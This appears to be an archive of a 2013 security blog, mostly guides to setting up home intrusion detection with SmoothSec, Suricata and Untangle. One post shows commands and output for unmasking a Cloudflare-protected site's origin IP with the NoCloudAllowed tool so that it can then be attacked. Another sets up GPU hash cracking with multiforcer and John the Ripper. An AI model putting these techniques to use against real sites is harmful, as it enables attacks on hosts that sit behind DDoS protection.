Wednesday, December 18, 2013

HOWTO : Build a Fortress for Your Home/SOHO Network

**** Content is updated for SmoothSec 3.4-1 on January 30, 2014 ****

Hardware

(A) Unified Threat Management System (UTM)
Minix Mini HD PC (J&W) :
CPU - Intel ATOM D2550 (dual-core and 4 Hyper-Threading)
Chipset - Intel NM10
GPU - Intel GMA 3600 Series
RAM - 2 x 2GB (DDR3-1066 SO-DIMM) 4GB
Hard Drive - 1 x 2.5-inch Hard Drive (80GB or above)
Networking - Dual Broadcom 57788 Gigabit Ethernet

(B) Intrusion Detection/Prevention System (IDS/IPS)
Minix Mini HD PC (J&W) :
CPU - Intel ATOM D2550 (dual-core and 4 Hyper-Threading)
Chipset - Intel NM10
GPU - Intel GMA 3600 Series
RAM - 2 x 4GB (DDR3-1066 SO-DIMM) 8GB
Hard Drive - 1 x 2.5-inch Hard Drive (120GB or above)
Networking - Dual Broadcom 57788 Gigabit Ethernet
USB Networking - PCi USB 3.0 Gigabit LAN Adapter UE-1000T-G3 or Level One USB Gigabit Ethernet USB-0401

* A switch is also required for this setup if you have more than one computer.

I prefer the setup is as the following :

Internet - SmoothSec (Suricata) - Router (Untangle UTM) - Switch (any switch) - Computers

Software

(A) Untangle 10.0 (64-bit) as UTM
Make sure you install the Lite Package which is free of charge. If you want to purchase their services, such as Standard, you can install Standard Package. For home/SOHO, Lite Package is enough.

After the basic installation, you need to create an account to the untangle.com in order to install Lite Package (or Standard Package).

(B) SmoothSec 3.4-1 (64-bit) as IDS/IPS with Suricata
Before setting up your SmoothSec, you need to upgrade the SmoothSec scripts to 3.6 and follow the instruction at the link just provided.

To set up IDS/IPS with Suricata, you can follow this section. Make sure you select “suricata” as AF_ENGINE in the configure file. Meanwhile, you should follow this section to set up.

For rules handling, you can refer to this link.

To fully understand the setup, you can read this article even it is written for 3.6 (not yet released at the moment) and the concept is the same.

Conclusion

Due to the high performance of AF_PACKET of Suricata, Broadcom 57788 Gigabit Ethernet and the Intel ATOM D2550 CPU, the network can play 1440p Youtube video without problem. The QoS is set to Medium in the Untangle 10.0 is recommended.

Meanwhile, Minix Mini HD PC is around $120-US (barebone without RAM and Hard drive) and the hardware cost is not too expensive to setup a fortress to your home/SOHO network. The running cost of this setup is very low as the software are free of charge. The footprint of the Minix Mini HD PC is very small. Smaller than a standard ITX computer case.

If you do not know how to manage SmoothSec (Suricata), you can install Untangle only.

Friday, December 06, 2013

HOWTO : NoCloudAllowed on Kali Linux

Cloudflare is designed to protect the websites from being Denial of Service (DoS) or Distributed Denial of Service (DDoS). It is acting a proxy and the real IP address of the websites are hidden. She also acts as a Web Application Firewall (WAF) to the websites that behind her services.

However, there is a number of ways to bypass this protection. Since FTP services cannot be protected by Cloudflare, the ftp sub-domain of the websites will be disclosed by using penetration testing tool - Fierce Domain Scan (fierce.pl). There may be some other services that cannot be protected by Cloudflare too.

Another way is using NetCraft.com to find the IP address history of the websites. Why it works? It is because some websites have been published for a while before using Cloudflare service. The IP address of the websites are being archived by NetCraft.com. However, the IP address of those websites cannot be changed or the SysAdmin overlooked it.

The captioned methods had been mentioned at my previous article.

How about there is no FTP service and no IP address history at NetCraft.com? So, we are panic? Be patient! Allison Nixon found a way to overcome this problem. She did a presentation at BlackHat 2013 in the title of Denying Service to DDoS Protection Services.

She (or with her team) developed a tool - NoCloudAllowed. How it works? The tool compare a range of IP addresses with the content of the origin website in order to find the real IP address of the origin website. The tool is written in Perl.

Now, I will show you how to install it on Kali Linux.

Step 1 :

Install of String::Compare.

perl -MCPAN -e 'shell'
install ExtUtils::MakeMaker
install String::Compare
exit


Step 2 :

Download nocloudallowed.pl.

wget http://nocloudallowed.com/nocloudallowed.pl



Type the following for “help” :

perl nocloudallowed.pl --help

Step 3 :

Refer to the BlackHat 2013 video, the website NoCloudAllowed.com is protected by Cloudflare and there is no previous IP address history at NetCraft.com.

Let’s us ping the website to see the IP address :

ping nocloudallowed.com
PING nocloudallowed.com (199.83.134.211) 56(84) bytes of data.
64 bytes from 199.83.134.211.ip.incapdns.net (199.83.134.211): icmp_req=1 ttl=128 time=818 ms
64 bytes from 199.83.134.211.ip.incapdns.net (199.83.134.211): icmp_req=2 ttl=128 time=262 ms
64 bytes from 199.83.134.211.ip.incapdns.net (199.83.134.211): icmp_req=3 ttl=128 time=274 ms
64 bytes from 199.83.134.211.ip.incapdns.net (199.83.134.211): icmp_req=4 ttl=128 time=502 ms
64 bytes from 199.83.134.211.ip.incapdns.net (199.83.134.211): icmp_req=5 ttl=128 time=264 ms
^C
--- nocloudallowed.com ping statistics ---
6 packets transmitted, 5 received, 16% packet loss, time 6209ms rtt min/avg/max/mdev = 262.464/424.601/818.947/217.222 ms

ping www.nocloudallowed.com
PING 2ruek.x.incapdns.net (103.28.248.171) 56(84) bytes of data.
64 bytes from 103.28.248.171.ip.incapdns.net (103.28.248.171): icmp_req=1 ttl=128 time=1433 ms
64 bytes from 103.28.248.171.ip.incapdns.net (103.28.248.171): icmp_req=2 ttl=128 time=450 ms
64 bytes from 103.28.248.171.ip.incapdns.net (103.28.248.171): icmp_req=3 ttl=128 time=278 ms
64 bytes from 103.28.248.171.ip.incapdns.net (103.28.248.171): icmp_req=4 ttl=128 time=472 ms
64 bytes from 103.28.248.171.ip.incapdns.net (103.28.248.171): icmp_req=5 ttl=128 time=495 ms
64 bytes from 103.28.248.171.ip.incapdns.net (103.28.248.171): icmp_req=6 ttl=128 time=519 ms
^C
--- 2ruek.x.incapdns.net ping statistics ---
7 packets transmitted, 6 received, 14% packet loss, time 6009ms rtt min/avg/max/mdev = 278.957/608.262/1433.255/377.086 ms, pipe 2


The result is that we got 2 different IP addresses - 199.83.134.211 and 103.28.248.171.

Step 4 :

There are two ways to use the nocloudallowed.pl. By "string matching" and "page percentage matching". Since the real IP address of nocloudallowed.com is 54.226.206.170, we limited the IP range from between 54.226.206.0 and 54.226.206.255 for the demo.

For realistic cases, the IP range may be from between 1.0.0.1 to 255.255.255.255. It will take a longer time to the result as predicted.

String matching :

perl nocloudallowed.pl -u http://www.nocloudallowed.com/ -i 54.226.206.0-54.226.206.255 -s @nixonnixoff

54.226.206.170 matched string


*** We select an unique string - @nixonnixoff at the front page of www.nocloudallowed.com for the matching purpose.

Page percentage matching :

perl nocloudallowed.pl -u http://www.nocloudallowed.com/ -i 54.226.206.0-54.226.206.255

54.226.206.46 is a 4.28008963583708% match 54.226.206.8 is a 4.97538454727825% match
54.226.206.96 is a 6.4580555778227% match 54.226.206.170 is a 76.6947984574021% match
54.226.206.178 is a 2.6906293003467% match 54.226.206.153 is a 13.6152088933292% match
54.226.206.196 is a 5.90278413052861% match 54.226.206.219 is a 6.97554375390092% match
54.226.206.149 is a 1.88944750445606% match 54.226.206.254 is a 3.71636207826023% match
54.226.206.252 is a 5.23038802551876% match 54.226.206.248 is a 9.19859919167773% match


The conclusion is that Cloudflare cannot protect your website as expected.

That’s all! See you.

Thursday, December 05, 2013

BlackHat 2013 - Denying Service to DDoS Protection Services

Speaker :

Allison Nixon
Integralis

Allison Nixon does penetration testing and incident response at Integralis, either assisting companies in post-compromise situation, or compromising them. She gained an interest in security by cheating at video games, but quickly learned that the only way to make real gold is to work for a real company. She is intensely interested in all facets of security and continues to perform security research spanning any and all topics. Allison is a regular host on the Pauldotcom podcast, has spoken at B-Sides Boston 2013, local OWASP meetings, and sits on the executive board of MalShare. She also designed the electronics and software for the laser maze at the 2012 Braintank conference.

Briefing :

In this age of cheap and easy DDOS attacks, DDOS protection services promise to go between your server and the Internet to protect you from attackers. Cloud based DDOS protection suffers from several fundamental flaws that will be demonstrated in this talk. This was originally discovered in the process of investigating malicious websites protected by Cloudflare- but the issue also affects a number of other cloud based services including other cloud based anti-DDOS and WAF providers. We have developed a tool – called No Cloud Allowed – that will exploit this new cloud security bypass method and unmask a properly configured DDOS protected website. This talk will also discuss other unmasking methods and provide you with an arsenal to audit your cloud based DDOS or WAF protection.



Archives :

Presentation & Paper

PoC :

NoCloudAllowed.com

After Thought :

Once the Cloudflare is bypassed and the origin IP address is obtained, you (attacker) can do anything on the origin as normal since the origin is not protected by the Cloudflare's WAF.

Reference :

HOWTO - NoCloudAllowed on Kali Linux

That’s all! See you.

Sunday, November 10, 2013

HOWTO : Enhance Kali Linux 1.0.5

This article is also suit for Kali Linux 1.0.9a

# hexchat (IRC Client)
Go to HexChat Download and download the latest version. Please note that it is for 64-bit.

For example, the latest version is hexchat_2.9.6.1-0_amd64.deb :

apt-get install libsexy2

wget http://dl.hexchat.net/hexchat/debian/hexchat_2.9.6.1-0_amd64.deb
dpkg -i hexchat_2.9.6.1-0_amd64.deb

# galculator
apt-get install galculator

# freemind (mindmap)
apt-get install freemind

# libreoffice
apt-get install libreoffice

# gedit
apt-get install gedit

# recordmydesktop
apt-get install gtk-recordmydesktop

# radiotray
apt-get install radiotray

# file-roller

apt-get install file-roller

# virtualbox
echo "deb http://download.virtualbox.org/virtualbox/debian wheezy contrib" > /etc/apt/sources.list.d/vbox.list

wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O- | sudo apt-key add -

apt-get update
apt-get install virtualbox-4.3


# flash
apt-get install flashplugin-nonfree

# alsa mixer to unmut the Kali Linux
apt-get install alsa alsa-tools
amixer sset Master unmute


nano /etc/default/pulseaudio

Change from :

PULSEAUDIO_SYSTEM_START=0

Change to :

PULSEAUDIO_SYSTEM_START=1


# Bluetooth Audio Device

/etc/init.d/bluetooth start

apt-get install pulseaudio-module-bluetooth pulseaudio-module-gconf bluez-audio


Then reboot the box. After boot up, configure the bluetooth device via the Bluetooth Icon on the top right corner. Make sure you start the bluetooth service beforehand.

# Web Browser Media Plugin

apt-get install totem-mozilla

If you already applied Apparmor, please add the following lines into the /etc/apparmor.d/usr.lib.iceweasel.iceweasel

/usr/share/totem/fullscreen.ui r,
/usr/share/totem/mozilla-viewer.css r,
/usr/share/totem/mozilla-viewer.ui r,


Now, you can play media in the web browser, such as Quicktime.

That's all! See you.

HOWTO : CUDA on Kali Linux 1.0.5

Step 1 :

Download the CUDA driver from nVidia Official Site.

# 64-bit
wget http://developer.download.nvidia.com/compute/cuda/5_5/rel/installers/cuda_5.5.22_linux_64.run

# 32-bit
wget http://developer.download.nvidia.com/compute/cuda/5_5/rel/installers/cuda_5.5.22_linux_32.run

Step 2 :

Install the CUDA driver. Accept the default values and select to install nVidia display driver also.

# 64-bit
chmod +x cuda_5.5.22_linux_64.run
./cuda_5.5.22_linux_64.run


# 32-bit
chmod +x cuda_5.5.22_linux_32.run
./cuda_5.5.22_linux_32.run


Step 3 :

Create a .bash_profile.

nano /root/.bash_profile

# 64-bit
export PATH=/usr/local/cuda-5.5/bin:$PATH
export LD_LIBRARY_PATH=/usr/local/cuda-5.5/lib64:$LD_LIBRARY_PATH


# 32-bit
export PATH=/usr/local/cuda-5.5/bin:$PATH
export LD_LIBRARY_PATH=/usr/local/cuda-5.5/lib:$LD_LIBRARY_PATH


Step 4 :

Update the boot loader to disable the open source nvidia display driver.

sed 's/quiet/quiet nouveau.modeset=0/g' -i /etc/default/grub
update-grub
reboot


Step 5 (Optional) :

To test the CUDA with multiforcer.

# multiforcer for nvidia (example)
cd /usr/share/multiforcer/
multiforcer -h NTLM -c charsets/charsetall -f test_hashes/Hashes-NTLM-Full.txt --noopencl


Step 6 (Optional) :

John the Ripper for CUDA.

# 64-bit
wget http://www.openwall.com/john/g/john-1.7.9-jumbo-7.tar.gz
tar -xvzf john-1.7.9-jumbo-7.tar.gz
cd john-1.7.9-jumbo-7/src
make
make clean linux-x86-64-gpu

cd ../run
./john --help


That's all! See you.

Tuesday, September 24, 2013

HOWTO : High Performance IDS/IPS with SmoothSec 3.4

The following Intrusion Detection/Prevention System (IDS/IPS) setup is using AF_PACKET with SmoothSec 3.4. The following setup is for low traffic flow home and SOHO users (or you can say that it is a Proof-of-Concept). If your traffic is heavy, please consider to use a high-end hardware.

(A) Hardware

IDS/IPS -

Motherboard - Intel Desktop Board D510MO
CPU - Intel Atom D510 (Dual-core with HT)
RAM - 4GB (2 x 2GB)
Hard Drive - 320GB
Network Card 0 (eth0) - Onboard Gigabit
Network Card 1 (eth1) - TP-Link TG-3269 Gigabit PCI Network Adapter (with low profile)
Network Card 2 (eth2) - D-Link DUB-E100 USB 2.0 Fast Ethernet Adapter (up to 200MB)

* You can select (1) Level One USB-0401 USB Gigabit Ethernet Adapter or (2) PCi USB 3.0 Gigabit LAN Adapter UE-1000T-G3 for eth2. However, you need to compile and install the driver yourself.

Update : If you are using Backports latest kernel, the Level One USB-0401 and PCi UE-1000T-G3 are workable out of the box.

Router -

Motherboard - Intel Desktop Board D510MO
CPU - Intel Atom D510 (Dual-core with HT)
RAM - 4GB (2 x 2GB)
Hard Drive - 320GB
Network Card 0 (eth0) - Onboard Gigabit
Network Card 1 (eth1) - TP-Link TG-3269 Gigabit PCI Network Adapter (with low profile)

(B) Software

IDS/IPS -

Operating System - Debian 7.0 (Wheezy)
IDS/IPS Pre-configure system - SmoothSec 3.4 (64-bit)
IDS/IPS Engine - Snort (or Suricata)
Unified2 Spooler - Pigsty
Web Interface - Snorby
Rules Management - PulledPork

Router -

Operating System - Untangle 9.4.2 (64-bit)

* Basically, Untangle is a router and Unified Threat Management System (UTM).

(C) Hardware Setup

Internet ---- Router ---- SmoothSec ---- Switch ---- Personal Computers

Router -- eth0 connect to Internet; eth1 connect to SmoothSec

SmoothSec -- eth0 connect to Router; eth1 connect to Switch (uplink or port 1); eth2 connect to Switch (any port at 2 to 4)

* You can use any router to replace Untangle.

(D) Installation of SmoothSec

Download SmoothSec 3.4 at here or here.

Make sure the SmoothSec box can surf the internet; otherwise, installation will be failed. Or, you may re-arrange the cables when necessary.

Updated : Since the scripts for 3.4 has been updated to 3.4.1, you should follow the below link to upgrade the script to 3.4.1.

Upgrade to scripts version 3.4.1

The scripts 3.4.1 will install Backports newest kernel instead of Unstable kernel for Suricata IPS mode with AF_PACKET.

After installed SmoothSec, type the following :

smoothsec.first.setup

Snort -

Select "ips-standard" and following the instruction to install. Please also refer to here for the configuration of the config file. Make sure "AF_ENGINE" is set to "snort". The rules are "et" by default.

After install, reboot your box.

Suricata -

Select "ips-standard" and following the instruction to install. Please also refer to here for the configuration of the config file. Make sure "AF_ENGINE" is set to "suricata". The rules are "et" by default.

A new Linux kernel 3.10.2 will be installed at the end.

After install, reboot your box.

(E) Configuration of IDS/IPS

You may need to disable or/and drop some rules (sid).

Snort -

You may need to configure the /etc/snort/snort.conf :

nano /etc/snort/snort.conf

For example, the subnet is 192.168.1.0/24.

Replace "ipvar HOME_NET any" with "ipvar HOME_NET [192.168.1.0/24]"

Replace "ipvar EXTERNAL_NET any" with "ipvar EXTERNAL_NET ![192.168.1.0/24]"

Restart Snort :

/etc/init.d/snort restart

Disable rules :

nano /etc/pulledpork/snort/disablesid.conf

Drop rules :

nano /etc/pulledpork/snort/dropsid.conf

After doing that, reload the rules :

smoothsec.snort.rules.update

Suricata -

Disable rules :

nano /etc/pulledpork/suricata/disablesid.conf

Drop rules :

nano /etc/pulledpork/suricata/dropsid.conf

After doing that, reload the rules :

smoothsec.suricata.rules.update

* If the rule is too long to disable or drop, you may consider to edit "modifysid.conf". For example, to disable and drop the following rule :

To disable the rule :

2013437 "alert" "##alert";

To drop the rule :

2013437 "alert" "drop";

(F) Configuration of Snorby

For example, the sensor IP address is 192.168.1.180.

Point your browser to https://192.168.1.180. Enter the username and password of Snorby.

Setup the Snorby according to SmoothSec WiKi.

* If you want to sent your Snorby reports by Postfix, you need to install yourself and configure it then.

sudo apt-get install postfix

Select "Internet Site" when asked.

(G) IDS/IPS Tuning

There may be some false positive records. You need to tune the setting by adding the sid to the disablesid.conf or dropsid.conf when necessary. When use with dropsid.conf, yon may need to set firewall at Router to make the job done.

(H) Remarks

In the captioned setting, the SmoothSec acts as IDS and IPS in one box.

If you want to install IDS only, your SmoothSec only requires one Network Card which is connected to Switch.

In addition, SmoothSec 3.4 comes with Distributed IDS/IPS which allows you to deploy multi-sensors with one control panel (Snorby).

Furthermore, you can also reset your box to the fresh install environment :

smoothsec.reset

When using Snorby, you may need to browse for the rules sid. This link is for the rules lookup.

Make sure you create an empty file namely restart.txt under /var/www/snorby/tmp :

touch /var/www/snorby/tmp/restart.txt

That's all! See you.

Monday, September 09, 2013

HOWTO : 15 Minutes to Deploy an IDS with SmoothSec 3.4

You can deploy your IDS (Intrusion Detection System) to your LAN within 15 minutes with SmoothSec 3.4. You can install SmoothSec 3.4 in virtual machine, such as VMWare, VirtualBox or Parallels.

The virtual machine is required at least one CPU, 1GB RAM and 8G+ HDD to run the IDS. The NIC is a bridged adaptor.



That's all! See you.

Sunday, September 08, 2013

HOWTO : 30 minutes to deploy a distributed IDS with SmoothSec 3.4



Distributed IDS is one of the features of SmoothSec 3.4. It allows you to monitor more than one sensor with one web interface (Snorby). Furthermore, the distributed IDS can be deployed by virtual machine, such as VMWare, VirtualBox and Parallels.

The basic virtual machines (console and sensor) requirement is 1 CPU, 1GB RAM and 8GB+ virtual storage.

You can install up to 2 IDS engines, Snort and Suricata in one box or either one of them.

Hints for installation

When installing sensor, you will be asked for ssh passphrase, you just press "Enter" and leave it empty. The path of the ssh key pairs should be default (nothing to change).

That's all! See you.

Sunday, September 01, 2013

HOWTO : Intrusion Detection System (IDS) made easy with SmoothSec 3.2

Building an IDS (Intrusion Detection System) at home/SOHO is not a dream today. SmoothSec 3.2 is designed for deploying IDS without tear. You can use a very low-end hardware for this purpose. To deploy IDS, you are required at least 2 NICs (Network Interface) if you have a management switch with SPAN port. If you do not have this piece of expensive device, you can build one with 3 NICs.

Hardware

Motherboard - Intel Desktop Board D510MO
RAM - 4GB DDR2 (2 x 2GB)
Hard Drive - 320GB
Network Card 0 - Onboard Gigabit
Network Card 1 - TP-Link TG-3269 Gigabit PCI Network Adapter (with low profile)
Network Card 2 - D-Link DUB-E100 USB 2.0 Fast Ethernet Adapter (up to 200MB)

Software

Operating System - Debian 7 (Wheezy) IDS/IPS pre-configured system - SmoothSec 3.2 (64-bit).
IDS/IPS Engine - Suricata

Setup

Internet -- Router -- SmoothSec -- Switch -- Personal Computers

Network Card 0 and 1 will be bridged up while Network Card 2 will be a management interface.

Step 1 :

First of all, SmoothSec (Network Card 2) is connected to the Switch while Network Card 0 and 1 do not connect to the router. It is because you need to connect to the internet for the installation.

Step 2 :

Install SmoothSec as usual or follow the wiki. During the installation, you may be prompted some firmware are missing, you just ignore it as some firmware for Realtek 8169 are missing. It is harmless to do so. After installed, the box will be reboot.

Login as "root" with password "toor".

Step 2a :

To improve the SmoothSec :

apt-get --purge remove arpwatch
apt-get install arpalert openjdk-7-jre fail2ban
cd /etc/arpalert/
mv oui.txt oui.txt.old
wget http://standards.ieee.org/regauth/oui/oui.txt


Step 3 (Configuration of Suricata) :

Suricata

nano /etc/suricata/suricata.yaml

Locate "- fast:" and change "enabled: no" to "enabled: yes".

Locate "- drop:" and change "enabled: no" to "enabled: yes".

Time Zone for Snorby

If your time zone is not UTC, you should run the following command :

dpkg-reconfigure tzdata

Set the time zone for "UTC" at "None of the above"; otherwise, the Snorby will reported wrong timestamp.

Set your time zone at the Snorby web interface when it is available after Step 5.

Email feature of Snorby

apt-get install postfix

Configure the Postfix properly according to your network at "/etc/postfix/main.cf".

nano /var/www/snorby/config/initializers/mail_config.rb

Uncomment the lines just below "# Sendmail Example:".

Step 4 :

Connect Network Card 0 to router and Network Card 1 to Switch.

Normally, Network Card 0 will be eth0, Network Card 1 will be eth1 and Network Card 2 will be eth2.

nano /etc/network/interfaces

Comment all about eth2 entries.

Append the following :

auto eth2
iface eth2 inet static
   address 192.168.0.120
   netmask 255.255.255.0
   gateway 192.168.0.1


* where the "address" is your SmoothSec IP address and "gateway" is the IP address of your router.

nano /etc/init.d/bridge

Change "net1=eth1" to "net1=eth0"
Change "net2=eth2" to "net2=eth1"
Change "brctl addif $br eth1" to "brctl addif $br eth0"
Change "brctl addif $br eth2" to "brctl addif $br eth1"

update-rc.d bridge defaults

Step 5:

Run the script "smoothsec.first.setup" in the terminal.

Type "br0" when asking for monitor network interface.

Select "Snort" or "Suricata" as IDS Engine. I choose "Suricata".

Email address and password are for Snorby web interface login.

Then reboot.

Once boot up, go to one of the Personal Computers and browse "https://192.168.0.120". Then set the time zone and your report email address accordingly.

Step 6:

To update SmoothSec, you need to do the following commands (you can make a script to do so). The rules will be updated automatically in the early morning every day.

apt-get update
apt-get dist-upgrade
apt-get --purge autoclean
apt-get --purge autoremove
# update SmoothSec
cd /root/updates/
git pull origin master


Debug the mailing feature

Do not run the following commands unless you really need to.

cd /var/www/snorby

bundle exec rails c production
Snorby::Jobs::SensorCacheJob.new(true).perform

Known Issue

Pigsty will crash randomly. As a result, no capture in Snorby. The problem has been reported, see here. --> The workaround is to run a testing bash script on every 5 minutes to start Pigsty again.

nano /root/chkpigstylog

#!/bin/bash
# Check if "Error: " in pigsty.log or not. If yes, start Pigsty again.
STRING="Error: "
if grep -R "$STRING" /var/log/pigsty.log
then
   /root/runpigsty
fi


nano /root/runpigsty

#!/bin/bash
/usr/local/bin/pigsty -c /etc/pigsty/suricata.pigsty.config.js -i eth0 -n "Suricata" -d /var/log/suricata/ -m unified2.alert.* -D


crontab -e
*/5 * * * * /root/chkpigstylog


Update

Developers just fixed the problem. You just upgrade the Pigsty with the following command :

npm update pigsty-mysql -g
npm update pigsty -g


Reference

Snorby GitHub
Suricata
SmoothSec
Pigsty
SmoothSec WiKi - for installation

That's all! See you.

HOWTO : High Performance IDS/IPS with SmoothSec 3.2

Since the previous setup (HOWTO) of SmoothSec are not perfect, I am going to use AF_PACKET as packet acquisition engine. In this setting, you are required to have at least 3 network interfaces, one for the management purpose.

As AF_PACKET has high performance, even the very low-end hardware is benefited. The following setup is ideal for home/SOHO environment.

(A) Hardware

Motherboard - Intel Desktop Board D510MO
CPU - Intel Atom D510 (2-core with HT)
RAM - 4GB (2 x 2GB)
Hard Drive - 320GB
Network Card 0 (eth0) - Onboard Gigabit
Network Card 1 (eth1) - TP-Link TG-3269 Gigabit PCI Network Adapter (with low profile)
Network Card 2 (eth2) - D-Link DUB-E100 USB 2.0 Fast Ethernet Adapter (up to 200MB)

(B) Software

Operating System - Debian 7.0 (Wheezy)
IDS/IPS pre-configure system - SmoothSec 3.2 (64-bit)
IDS/IPS Engine - Suricata
Spooler - Pigsty
Web Interface - Snorby
Rules Management - PulledPork

(C) Setup

Internet -- Router -- SmoothSec -- Switch -- Personal Computers

The SmoothSec will monitor all the incoming and outgoing traffic between router and the switch.

Step a - Cable connection :

First of all, SmoothSec (Network Card 2) is connected to the Switch while Network Card 0 and 1 do not connect to the router at the moment. It is because you need to access the internet for the SmoothSec installation.

Step -1 - Installation of SmoothSec :

Install SmoothSec as usual or refer to SmoothSec Wiki. When you are prompted to install non-free network interface firmware, you just ignore it. It is because Debian missed some firmware for Realtek 8169. After the installation, reboot the box as advice. The username is "root" while the password is "toor".

Step 0 - Install the missing packages :

apt-get install ethtool postfix fail2ban openjdk-7-jre

If you want to use Postfix as mail server for the Snorby report, you should install it and configure it after the install. For the configuration of Postfix, you may ask Google if you do not know how to.

Make sure you select "Internet Site" when installing Postfix.

You may consider to install fail2ban to protect your ssh connection inside the network.

To improve the SmoothSec :

apt-get --purge remove arpwatch
apt-get install arpalert
cd /etc/arpalert/
mv oui.txt oui.txt.old
wget http://standards.ieee.org/regauth/oui/oui.txt


Step 1 - Get new Linux Kernel :

In order to install a high performance IDS/IPS, you need a newer kernel that the version should be 3.7 or greater.

apt-cache search linux-image

To look for Linux Kernel version that is greater than 3.7. If not, just add the following repos :

nano /etc/apt/sources.list

Append the following line (the address of the source may be different from yours, but it must be "unstable" :
deb http://ftp.us.debian.org/debian/ unstable main
deb-src http://ftp.us.debian.org/debian/ unstable main


Then look for Linux Kernel version that is greater than 3.7 :

apt-get update

I select the version 3.10 :

apt-get install linux-image-3.10-2-amd64 linux-headers-3.10-2-amd64

When you are asked to restart some services when install, just reply "yes".

You will be warned for some firmware missing, just ignore it. It is because Debian do not has some firmware for Realtek 8169. Anyway, it is harmless.

After the new kernel install, comment out what you added in "/etc/apt/sources.list". This step is VERY IMPORTANT as the newer version of Apache (2.4.x) and Perl will break the Snorby and PulledPork, the web interface of the SmoothSec and rules management tool.

Then reboot the SmoothSec and select the new kernel when it is available.

Step 2 - Configure Suricata :

nano /etc/suricata/suricata.yaml

Locate "#- delayed-detect: yes" and replace with "- delayed-detect: yes".

Locate "- fast:" and replace "enabled: no" with "enabled: yes".

Locate "- drop:" and replace "enabled: no" with "enabled: yes".

Locate "af-packet:" and replace "threads: 1" with "threads: 4". Or, the number of core of CPU you have.

Locate "#checksum-checks: kernel" and replace it with "checksum-checks: kernel".

Locate "#copy-mode: ips" and replace it with "copy-mode: ips".

Locate "#copy-iface: eth1" and replace it with "copy-iface: eth1".

Add "buffer-size: 64535" just below "copy-iface: eth1".

Locate "- interface: eth1" and replace "threads: 1" with "threads: 4". Or, the number of core of CPU you have.

Add the following lines just below "# disable-promisc: no" :

buffer-size: 64535
copy-mode: ips
copy-iface: eth0
use-mmap: yes
checksum-checks: kernel


Locate "rule-files:" and add "- local.rules" just below "- emerging.rules".

touch /etc/suricata/rules/local.rules

nano /etc/init.d/suricata

Locate "/usr/local/bin/suricata --user suricata -c /etc/suricata/suricata.yaml -i $INTERFACES -D" with "/usr/local/bin/suricata --user suricata -c /etc/suricata/suricata.yaml --af-packet -D"

There are 2 entries, you should replace them all.

Step 3 - Time Zone :

Make sure your SmoothSec is UTC no matter your time zone is. It is because, Snorby is only working on UTC. Otherwise, the timestamp of Snorby will be wrong.

To check time zone of SmoothSec :

date

If the time is not UTC, you need to change back to it :

dpkg-reconfigure tzdata

Set the time zone to "UTC" at "None of the above".

Step 4 - Configure email feature of Snorby :

If you installed Postfix, configure it properly according to your network at "/etc/postfix/main.cf".

nano /var/www/snorby/config/initializers/mail_config.rb

Then uncomment the lines just below "#Sendmail Example:". Or, refer to the SmoothSec Wiki for the installation.

Step 5 - Configure network interfaces :

Make it looks like the following. Make sure your eth2 has your IP "address" and "gateway" instead of "192.168.2.180" as it is an example only :

nano /etc/network/interfaces

# The loopback network interface
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet manual
   up ifconfig eth0 0.0.0.0 up
   down ifconfig eth0 down
   post-up ethtool -K eth0 gro off

auto eth1
iface eth1 inet manual
   up ifconfig eth1 0.0.0.0 up
   down ifconfig eth1 down
   post-up ethtool -K eth1 gro off

# The primary network interface
#allow-hotplug eth2
#iface eth2 inet dhcp
auto eth2
iface eth2 inet static
   address 192.168.2.180
   netmask 255.255.255.0
   gateway 192.168.2.1


* Please note that ethtool is used as the Realtek network interfaces will produce error when working as AF_PACKET method.

Error messages when doing debugging with "suricata -c /etc/suricata/suricata.yaml --af-packet" :

[ERRCODE: SC_ERR_SOCKET(200)] - Sending packet failed on socket 10: Message too long
[ERRCODE: SC_ERR_INVALID_ACTION(142)] - Unable to release packet data


Step 6 - Configure SmoothSec :

Run the following script to setup SmoothSec :

smoothsec.first.setup

Type "eth0" when asks for the monitor interface. Enter "192.168.2.0/24" when asked for the network. Please note that the address here is an example only. When asked for Intrusion Detection Engine, you type "2" for Suricata. The email address and password asked are for the login purpose of Snorby (web interface).

Step b - Cable connection :

Connect Network Card 0 to the router and Network Card 1 to the switch. Network Card 2 connect to the switch.

When done, reboot the SmoothSec.

Step 7 - Browse Snorby :

You need to wait for several minutes before you can connect to the internet as Suricata need some time to do with the rules.

Open your browser and enter the following url :

https://192.168.2.180

Accept the certificate and wait for about a minute the Snorby will show up.

Step 8 - IPS Setup :

Now your SmoothSec is running as IDS (Intrusion Detection System) and it will not block or drop any malicious traffic.

To configure the SmoothSec to running as IPS (Intrusion Prevention System), you need to :

nano /etc/pulledpork/suricata/dropsid.conf

Append the following :

pcre:MS(0[0-9]|1[0-9])-\d+,bugtraq:\d+,cve:20[0-9][0-9]-\d+

So, you will drop/block any malicious traffic that match the vulnerabilities in the vulnerability reports, such as cve and bugtraq as well as Microsoft's. Meanwhile, you can add your own rules in "/etc/suricata/rules/local.rules". Make sure to run "smoothsec.suricata.rules.update" after your add them.

You may want to disable some rules :

nano /etc/pulledpork/suricata/disablesid.conf

Append the following :

1:2210000-1:2210049

It will disable the rules serial 2210000 to 2210049. A total of 50 rules to be disabled.

After done, run the following script :

smoothsec.suricata.rules.update

* Please also note that you are required to wait for several minutes before you can connect to the internet as Suricata requires some time to do with the rules.

(D) Troubleshooting

(1) In case you find there is no GeoIP information on the events, you should check if the file "snorby-geoip.dat" in /var/www/snorby/config/ or not. If not, just download it, please follow the below commands. If the file does not exist, that mean you cannot connect to the internet when installing Snorby.

cd /tmp/
wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCountry/GeoIP.dat.gz
gzip -d GeoIP.dat.gz
mv GeoIP.dat snorby-geoip.dat
chown www-data:www-data snorby-geoip.dat
cp snorby-geoip.dat /var/www/snorby/config/


(2) In case you do not capture the events, you should make sure the correct interface name (such as eth0, eth1 and eth2) are connected properly. You should examine the MAC address of the Network Card to determine the correct interface name.

(E) Performance

The SmoothSec is installed on a low-end hardware (Intel Atom D510 CPU with Realtek Gigabit NICs). It is also behind a router, which is running Untangle (Intel Atom D510 CPU with Realtek Gigabit NICs). Untangle is an UTM (Unified Threat Management System) which can block some malicious traffic (but a few only). The switch is D-Link DGS-1008D (Home) Gigabit switch.

To test the performance, I am watching a youtube at 1080p on PC-1 (via wifi), watching a youtube at 720p on PC-2 (via wifi) and watching a youtube at HD on Android smartphone with wifi. The result is very smooth without any lagging for all the devices.

The CPU loading for the test is below 4.x and memory used is below 3GB.

